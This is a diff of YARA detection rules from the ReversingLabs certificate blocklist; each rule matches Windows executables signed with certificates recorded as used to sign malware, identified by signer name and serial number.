+rule REVERSINGLABS_Cert_Blocklist_387Eeb89B8Bf626Bbf4C7C9F5B998B40 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "56653f72-39af-50e7-9908-e516f9b21084"
+		id = "2f4a26f2-689a-57bd-8028-d3554e339e60"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16926-L16942"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1584e39b4e2025611bcb7bbbd92b97d25d12ddbb1e5c282db87730a03f7f56b1"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9978-L9994"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2377eeb5316d25752443735e78d0ad7de398a2677f5a0fd45fd6e6c87720d49b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21943,21 +46608,21 @@ rule REVERSINGLABS_Cert_Blocklist_169138A86954Be1D9B264F47 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "16:91:38:a8:69:54:be:1d:9b:26:4f:47" and 1477636474 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ULTRA ACADEMY LTD" and pe.signatures [ i ] . serial == "38:7e:eb:89:b8:bf:62:6b:bf:4c:7c:9f:5b:99:8b:40" and 1637141034 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_33412168Eeb3C0E4C7Dd0508A9Ffecd5 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_292Eb1133507F42E6F36C5549C189D5E : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "db2ae33e-d3af-5200-ad15-824e29434e2c"
+		id = "b557864d-c573-5789-9959-8df3036d5ac5"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16944-L16960"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d634af0637c3349fe1718ee807b8a75007ab46b141494331901a22ce54e9fc5d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9996-L10012"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "bc3ef217455b74900cae114d25b02325d2bef25c11873342df1dd2369cbce76a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21967,21 +46632,21 @@ rule REVERSINGLABS_Cert_Blocklist_33412168Eeb3C0E4C7Dd0508A9Ffecd5 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures [ i ] . serial == "33:41:21:68:ee:b3:c0:e4:c7:dd:05:08:a9:ff:ec:d5" and 1467590400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Affairs-case s.r.o." and pe.signatures [ i ] . serial == "29:2e:b1:13:35:07:f4:2e:6f:36:c5:54:9c:18:9d:5e" and 1638832273 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_422Ab71Ac7Fb125Ad7171B0C99510B0E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5Fbf16A33D26390A15F046C310030Cf0 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "002e344e-a073-5d00-9488-d73fad51c66a"
+		id = "620c04df-e613-5319-aa00-646c7e0c8031"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16962-L16978"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7366e5064a9a9f66260730575327e404eadea096ba3f6cf28c83c47bef9bca58"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10014-L10030"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "24bee3563e0867ef6702e7f57bbce7075f766410650ae5ce1e2e8c7b14a3eaca"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21991,21 +46656,21 @@ rule REVERSINGLABS_Cert_Blocklist_422Ab71Ac7Fb125Ad7171B0C99510B0E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "42:2a:b7:1a:c7:fb:12:5a:d7:17:1b:0c:99:51:0b:0e" and 1475193600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MACHINES SATU MARE SRL" and pe.signatures [ i ] . serial == "5f:bf:16:a3:3d:26:39:0a:15:f0:46:c3:10:03:0c:f0" and 1638390070 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6F18946E5B773B7E32D9E7B4Fb8D434C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0F007898Afcba5F8Af8Ae65D01803617 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "53205508-568c-5356-9717-2915c8f3806c"
+		id = "6678bd73-bf4d-5576-8bf2-b721ee288da7"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16980-L16996"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "fa285c17b43d1acdb05888074ecb16047209ade8f7f6191274f58eca7438dadf"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10032-L10048"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "27610bb3bf069991803611474abf44a3bf82fc9283d0412a1c24ae46a3f5352e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22015,21 +46680,21 @@ rule REVERSINGLABS_Cert_Blocklist_6F18946E5B773B7E32D9E7B4Fb8D434C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VECTOR LLC (VEKTOR, OOO)" and pe.signatures [ i ] . serial == "6f:18:94:6e:5b:77:3b:7e:32:d9:e7:b4:fb:8d:43:4c" and 1454716800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TechnoElek s.r.o." and pe.signatures [ i ] . serial == "0f:00:78:98:af:cb:a5:f8:af:8a:e6:5d:01:80:36:17" and 1638372946 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3596Dfc23B9A42C66700982250Da2906 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_E55Be88Ddbd93C423220468D430905Dd : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "15c3551f-7b08-5e7f-a540-68b3eccac316"
+		id = "37e60515-0395-51a5-8bfa-35e3e336d60c"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16998-L17014"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1b69bf520fde5255069cf8752d5c67716e9bc297ddde1566551a563a563197ea"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10050-L10068"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "05b2f297454e7080591b85991b224193eb89fc5074eb3c2e484ceadad2de4cb7"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22039,21 +46704,21 @@ rule REVERSINGLABS_Cert_Blocklist_3596Dfc23B9A42C66700982250Da2906 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, Song WU" and pe.signatures [ i ] . serial == "35:96:df:c2:3b:9a:42:c6:67:00:98:22:50:da:29:06" and 1397219344 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VALVE ACTUATION LTD" and ( pe.signatures [ i ] . serial == "00:e5:5b:e8:8d:db:d9:3c:42:32:20:46:8d:43:09:05:dd" or pe.signatures [ i ] . serial == "e5:5b:e8:8d:db:d9:3c:42:32:20:46:8d:43:09:05:dd" ) and 1637712000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_486Bbddc8C5Ee99F051Ecaeb3F99D2A3 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_06Bcb74291D96096577Bdb1E165Dce85 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "07b43dd7-e8f1-5b14-a0f4-42294b5b597e"
+		id = "da483b60-d400-54ef-84e0-ea00b299b466"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L17016-L17032"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "75855e26ba4e01b56a551a006e789c6032cfb02c6f6125a9bdf8becb848db5b2"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10070-L10086"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "00b7ff8f3cbc04c48c71433c384d7a7884b856f261850e33ea4413a12cf5a1b5"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22063,21 +46728,21 @@ rule REVERSINGLABS_Cert_Blocklist_486Bbddc8C5Ee99F051Ecaeb3F99D2A3 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "48:6b:bd:dc:8c:5e:e9:9f:05:1e:ca:eb:3f:99:d2:a3" and 1473292800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Revo Security SRL" and pe.signatures [ i ] . serial == "06:bc:b7:42:91:d9:60:96:57:7b:db:1e:16:5d:ce:85" and 1637971201 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_11211Eea9D0D1D1A325B5Eae1B2B1951120F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_C8442A8185082Ef1Ed7Dc3Fff2176Aa7 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "09b8b3f3-a4aa-5584-b8d0-751cc87267bf"
+		id = "2a56ff80-584b-5b8b-80ae-e763339cd17a"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L17034-L17050"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "bafab986605be61d25a6764042937bc5d8c55196ea8ea9aa9360764d9681351b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10088-L10106"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "74b1b48f0179187ea7bb8ef4663bf13da47f5c6405ecc5589706184564c05727"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22087,21 +46752,21 @@ rule REVERSINGLABS_Cert_Blocklist_11211Eea9D0D1D1A325B5Eae1B2B1951120F : INFO FI
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LLC HERMES" and pe.signatures [ i ] . serial == "11:21:1e:ea:9d:0d:1d:1a:32:5b:5e:ae:1b:2b:19:51:12:0f" and 1460147212 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ambidekstr LLC" and ( pe.signatures [ i ] . serial == "00:c8:44:2a:81:85:08:2e:f1:ed:7d:c3:ff:f2:17:6a:a7" or pe.signatures [ i ] . serial == "c8:44:2a:81:85:08:2e:f1:ed:7d:c3:ff:f2:17:6a:a7" ) and 1616976000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_172Fea8Cb06Ffced6Bfac7F2F6B77754 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0406C4A1521A38C8D0C4Aa214388E4Dc : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0890bf55-ebd5-5b68-8047-14692a5f1ae7"
+		id = "9019330e-5ab5-5d37-85a1-0e882dbd68ce"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L17052-L17068"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8e1e3e7d002ce084600c5444dc9b0bad8771370cb7919a3bb5ebc899040e4cf2"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10108-L10124"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f6780751ae553771eb57201a8672847a24512e6279b6a4fd843d8ee2f326860a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22111,21 +46776,21 @@ rule REVERSINGLABS_Cert_Blocklist_172Fea8Cb06Ffced6Bfac7F2F6B77754 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "17:2f:ea:8c:b0:6f:fc:ed:6b:fa:c7:f2:f6:b7:77:54" and 1467936000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Venezia Design SRL" and pe.signatures [ i ] . serial == "04:06:c4:a1:52:1a:38:c8:d0:c4:aa:21:43:88:e4:dc" and 1641859201 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3Ee50Bb98Fadca2D662A0920E76685A2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_12705Fb66Bc22C68372A1C4E5Fa662E2 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5c35c73e-e4f6-5707-ad91-1db7c0a0ec81"
+		id = "78f9fdf0-d8c6-5316-8053-42f77adf95d1"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L17070-L17086"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d232923ed962fbf4a9a30890778c2380d6c6967a693c6f77c2f558bb4347e60e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10126-L10142"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f10316a26e2d34400b7c2e403eab18ab6c1cc94b35f0ac8a3f490d101d29dc8d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22135,21 +46800,21 @@ rule REVERSINGLABS_Cert_Blocklist_3Ee50Bb98Fadca2D662A0920E76685A2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ABDULKADIR SAHIN" and pe.signatures [ i ] . serial == "3e:e5:0b:b9:8f:ad:ca:2d:66:2a:09:20:e7:66:85:a2" and 1330041600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APRIL BROTHERS LTD" and pe.signatures [ i ] . serial == "12:70:5f:b6:6b:c2:2c:68:37:2a:1c:4e:5f:a6:62:e2" and 1642464000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_21Bfddb6A66435D1Adce2Ceb23Ed7C9A : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3B0914E2982Be8980Aa23F49848555E5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2009c47b-8a15-50fd-a229-5e34244ede1f"
+		id = "88ca65c4-ba0d-5676-979b-4fac737d4f21"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L17088-L17104"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "22ad68974a1c6729da369c26372ba93c25ddf68df880580c727bf2d3ee2d3a86"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10144-L10160"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ea7d9fa7817751fef775765b54be5dd4d00c15ca50ac10fb40fb46cc3634c7b0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22159,21 +46824,21 @@ rule REVERSINGLABS_Cert_Blocklist_21Bfddb6A66435D1Adce2Ceb23Ed7C9A : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\x9D\\xA8\\xE6\\xB7\\x87\\xE6\\x99\\xBA" and pe.signatures [ i ] . serial == "21:bf:dd:b6:a6:64:35:d1:ad:ce:2c:eb:23:ed:7c:9a" and 1395297334 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Office Rat s.r.o." and pe.signatures [ i ] . serial == "3b:09:14:e2:98:2b:e8:98:0a:a2:3f:49:84:85:55:e5" and 1643155200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5B1C3F7Bbaa91Ca49B06A5C1004Ee5Be : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_029Bf7E1Cb09Fe277564Bd27C267De5A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b78e7f2b-8122-5df6-ad79-393db9e0498d"
+		id = "1e66d13c-3345-592c-9bf8-b8a566c8b9e6"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L17106-L17122"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "9a8d9acc87668a6fbd9fdd52b6ef69d18de8f19d8f3d3ca8eeb630c6e8c25c65"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10162-L10178"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3f64372d11d61c669580d90cdf2201e7f2904fb3d73d27be2ff1559c9c37614a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22183,21 +46848,21 @@ rule REVERSINGLABS_Cert_Blocklist_5B1C3F7Bbaa91Ca49B06A5C1004Ee5Be : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jin Yuguang" and pe.signatures [ i ] . serial == "5b:1c:3f:7b:ba:a9:1c:a4:9b:06:a5:c1:00:4e:e5:be" and 1440643213 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAMOYAJ LIMITED" and pe.signatures [ i ] . serial == "02:9b:f7:e1:cb:09:fe:27:75:64:bd:27:c2:67:de:5a" and 1637712001 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0A2089 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D3Aee8Abb9948844A3Ac1C04Cc7E6Bdf : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "51e603bb-ef21-55e8-8f2b-94865f1213c9"
+		id = "6da50886-7f15-5565-9a1a-f6fb25a729ac"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L17124-L17140"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "07ce4d39af1e56fbbfa400cf139956826999043480f93c0fc43ed056f6420d7f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10180-L10198"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3f3f1d5c871d2b73627d4281ac5bcd08799fb47f94155e82795d97c87de35e40"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22207,21 +46872,21 @@ rule REVERSINGLABS_Cert_Blocklist_0A2089 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RocketMedia S.r.l." and pe.signatures [ i ] . serial == "0a:20:89" and 1050073884 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HOUSE 9A s.r.o" and ( pe.signatures [ i ] . serial == "00:d3:ae:e8:ab:b9:94:88:44:a3:ac:1c:04:cc:7e:6b:df" or pe.signatures [ i ] . serial == "d3:ae:e8:ab:b9:94:88:44:a3:ac:1c:04:cc:7e:6b:df" ) and 1640822400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1F84E030A0Ed10D5Ffe2B81B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_734819463C1195Bd6E135Ce4D5Bf49Bc : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "170dae5a-ed7e-5f20-9ccd-94724e4b2084"
+		id = "f7dd21fa-1501-50b2-bd9c-c33cfd932a6b"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L17142-L17158"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "097655cb2965ae71efb905ddf20ed30c240d25e03d08a1b6c87b472533ccc9d8"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10200-L10216"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a63c05cca23b61ba6eabda2b60c617b966a2669fd3a0da30354792e5c1ae2140"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22231,21 +46896,21 @@ rule REVERSINGLABS_Cert_Blocklist_1F84E030A0Ed10D5Ffe2B81B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "1f:84:e0:30:a0:ed:10:d5:ff:e2:b8:1b" and 1476869735 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "videoalarm s. r. o." and pe.signatures [ i ] . serial == "73:48:19:46:3c:11:95:bd:6e:13:5c:e4:d5:bf:49:bc" and 1637884800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_88346267057C0A82E2F39851D1B9694C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Db95B22362D46A73C39E0Ac924883C5B : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3be920eb-7b71-53c4-94b7-0ffc88d14c59"
+		id = "527b7963-340e-5d8f-b7e1-1269c0073ec9"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
